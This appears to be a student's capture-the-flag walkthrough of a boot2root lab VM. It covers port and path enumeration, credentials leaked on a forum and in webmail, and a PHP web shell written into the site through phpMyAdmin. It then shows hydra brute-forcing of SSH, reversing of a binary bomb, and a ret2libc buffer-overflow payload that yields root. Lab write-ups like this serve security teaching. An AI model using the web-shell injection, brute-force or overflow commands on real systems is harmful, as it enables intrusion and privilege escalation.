# 1. Find all open ports on a machine
Command: `sudo nmap -A <IP> -p1-1000`  
Result:
```
PORT    STATE SERVICE  
21/tcp  open  ftp  
22/tcp  open  ssh  
80/tcp  open  http  
143/tcp open  imap  
443/tcp open  https  
993/tcp open  imaps  
```

# 2. Find all open entry points for http / https server 
Command: `wfuzz -w wfuzz/wordlist/general/common.txt --hc 404 -c -t 4  https://<IP>/FUZZ`  

>More info:
>*   https://github.com/xmendez/wfuzz  
>*   https://wfuzz.readthedocs.io/en/latest/user/basicusage.html#fuzzing-paths-and-files

Result:
```
forum  
phpmyadmin  
webmail
```

# 3. Investigation of https server pages
## `forum` page

In one of the topic called `Probleme login ?` somebody published big log with a private information 
>**Login:** `lmezard`  
**Password:** `!q\]Ej?*5K5cy*AJ`

As it turned out the credentials used for this forum.  
After login with those credentials we can found his email address in profile: `laurie@borntosec.net`. Also we can found full list of all forum users:

```
admin  
lmezard  
qudevide  
thor  
wandre  
zaz
```

## `webmail` page
Login using lmezard's email address and password.  
In email with Subject `DB Access` we can found another login and password.
>**Login:** `root`  
**Password:** `Fg-'kKXBj87E:aJ$`

## `phpmyadmin` page
Login using previous DB login and password.
As we have access to Databases we can make any SQL injections.
>Find out the file hierarchy of the forum https://github.com/ilosuna/mylittleforum/releases/tag/2.4.20

Inject php page which will perform shell command and return response to us.
`select "<?php system($_GET['cmd']); ?>" into outfile "/var/www/forum/templates_c/term.php"`

Using injection get files under home directory `<IP>/forum/templates_c/term.php?cmd=ls -R /home`  
Get content of /home/LOOKATME/password `<IP>/forum/templates_c/term.php?cmd=cat /home/LOOKATME/password`
>**Login:** `lmezard`  
**Password:** `G!@M6f4Eatau{sF"`

# 4. FTP 
Using previous credentials to login via FTP.  
Get two files: `README` - with instruction inside, and `fun` - archive with 750 files inside.  
As we can see password is just twelwe character
```
BJPCP.pcap:589: printf("%c",getme1());
BJPCP.pcap:590: printf("%c",getme2());
BJPCP.pcap:591: printf("%c",getme3());
BJPCP.pcap:592: printf("%c",getme4());
BJPCP.pcap:593: printf("%c",getme5());
BJPCP.pcap:594: printf("%c",getme6());
BJPCP.pcap:595: printf("%c",getme7());
BJPCP.pcap:596: printf("%c",getme8());
BJPCP.pcap:597: printf("%c",getme9());
BJPCP.pcap:598: printf("%c",getme10());
BJPCP.pcap:599: printf("%c",getme11());
BJPCP.pcap:600: printf("%c",getme12());
BJPCP.pcap:601: printf("\n");
BJPCP.pcap:602: printf("Now SHA-256 it and submit");
```
The last 5 characters are known, the rest are confusing among the files.
```
BJPCP.pcap:90:char getme8() {
BJPCP.pcap-91-  return 'w';
--
BJPCP.pcap:205:char getme9() {
BJPCP.pcap-206- return 'n';
--
BJPCP.pcap:278:char getme10() {
BJPCP.pcap-279- return 'a';
--
BJPCP.pcap:379:char getme11() {
BJPCP.pcap-380- return 'g';
--
BJPCP.pcap:474:char getme12()
BJPCP.pcap-475-{
BJPCP.pcap-476- return 'e';
```
After a dozen unsuccessful attempts to compile all the files and get the password to the output, I decide to use my script `generate_fun_passwords.py` to generate possible passwords combination and bruteforce ftp with `hydra`.

Command:  `hydra -l laurie -P fun_passwords <IP> ssh`
>**Login:** `laurie`  
**Keyword:** `Iheartpwnage`  
**Password:** `330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4`

# 5. Bomb defusing
After connecting via SSH using previous credentials I found two files `README` - instruction and `bomb` - executable which must be hacked.  
For this step I used `radar2` tool.  
>More info:
>*   https://github.com/radareorg/radare2
>*   https://r2wiki.readthedocs.io/en/latest/

### Phase_1
It's really the simplest just string comparison inside.  
>**Password:** `Public speaking is very easy.`

### Phase_2
There are should be 6 digits separeted by space - `"%d %d %d %d %d %d"`  
Used algorithm:  
```
if (arr[0] != 1) 
    explode_bomb();
int i = 1;
int index = 2;
while (index < 6)
{
    if (arr[index] != (i * index))
        explode_bomb()
    i = arr[index];
    index++;
}
```
>**Password:** `1 2 6 24 120 720`

### Phase_3
Scanf line used by this phase - `%d %c %d`
There are 5 passwords posible, because there are switch case used inside this phase.
>**Passwords:**  
`0 q 777`  
`1 b 214`  
`2 b 755`  
`3 k 251`  
`4 o 160`

### Phase_4
Scanf string - `%d`  
Phase use **_Fibonacci_** function inside and password is just numerical sequence index wich give `0x37`
>**Password:** `9`

### Phase_5
Algorithm used:
```
if (strlen(src) != 6)
    explode_bomb();
char res[6];
char alp = "isrveawhobpnutfg";
for (int i = 0; i < 6; ++i)
{
    int index = src[i] & 0xf;
    res[i] = alp[index];
}
if (strcmp(res, "giants"))
    explode_bomb();
```
Posible permutation:

| Result | Index | PosValue |
| :----: | :---: | :------: |
| g      |  15   | o        |
| i      |  10   | p        |
| a      |  5    | e, u     |  
| n      |  11   | k        |
| t      |  13   | m        |
| s      |  2    | a, q     |  

>**Passwords:**  
`opekma`  
`opukma`  
`opekmq`  
`opukmq`

### Phase_6
Scanf string - `%d %d %d %d %d %d` six numbers less than 7, not repeated.
Because of too complicated logic inside I used my own python script `bomb_phase6_defuse.py` to brute force it.
>**Password:** `4 2 6 3 1 5`

### Secret phase
Activated on `phase_4` - should be enterred `9 austinpowers`.
Value should be less or equal `1001`. Using r2 debugger I find out that value should be:
```
val > 36    (0x804b320)  
val > 50    (0x804b308)  
val > 107   (0x804b2d8)  
val == 1001 (0x804b278)
```
>**Password:** `1001`

# 6. Thor's ssh password
Due to a large number of options I used my own script `generate_bomb_passwords.py` (_to generate all possible password combinations_) and `hydra` tool for brute force attack on ssh. 

Command: `hydra -l thor -P tor_passwords <IP> -t 4 ssh` - It took a long time.  
>More info:
>*   https://github.com/vanhauser-thc/thc-hydra

> **Password:** `Publicspeakingisveryeasy.126241207201b2149opekmq426135`

# 6. Zaz's credentials

In Thor's home directory I found `README` - instruction and `turtle` - text file with LOGO language instructions.  
>More info:  https://turtleacademy.com/

>**Keyword:** `SLASH`  
**Password:** `646da671ca01bb5d84dbb5fb2238dc8e` - md5

# 7. `exploit_me`
In Zaz's home directory:
```
-rwxr-x--- 1 zaz      zaz   943 Mar 28 14:48 .bash_history
-rwxr-x--- 1 zaz      zaz   220 Oct  8  2015 .bash_logout
-rwxr-x--- 1 zaz      zaz  3489 Oct 13  2015 .bashrc
drwx------ 2 zaz      zaz    43 Oct 14  2015 .cache
-rwxr-x--- 1 zaz      zaz   675 Oct  8  2015 .profile
-rwxr-x--- 1 zaz      zaz  1342 Oct 15  2015 .viminfo
-rwsr-s--- 1 root     zaz  4880 Oct  8  2015 exploit_me
drwxr-x--- 3 zaz      zaz   107 Oct  8  2015 mail
```

Binary investigation shows that there only main function inside which write comandline argument to **buffer** and print it using `puts`.  
As this binary have root permission I perform `ret2libc` attack.
>https://0x00sec.org/t/exploiting-techniques-000-ret2libc/1833


Using gdb to get `system()` addr
> `$1 = {<text variable, no debug info>} 0xb7e6b060 <system>`

With ltrace get buffer addr 
>`strcpy(0xbffff5e0, "aa")                       = 0xbffff5e0`

r2 buff_size
> `0x90` = `144`

Command: `sysctl kernel.randomize_va_space`  
>`kernel.randomize_va_space = 0`

Command: `find &system, +9999999,"/bin/sh"`  
>`0xb7f8cc58`

Command: `./exploit_me $(python -c "print 'A' * 140 + '\x60\xB0\xE6\xB7' + 'BBBB' + '\x58\xCC\xF8\xB7'")`  
Command: `whoami` 
>`root`
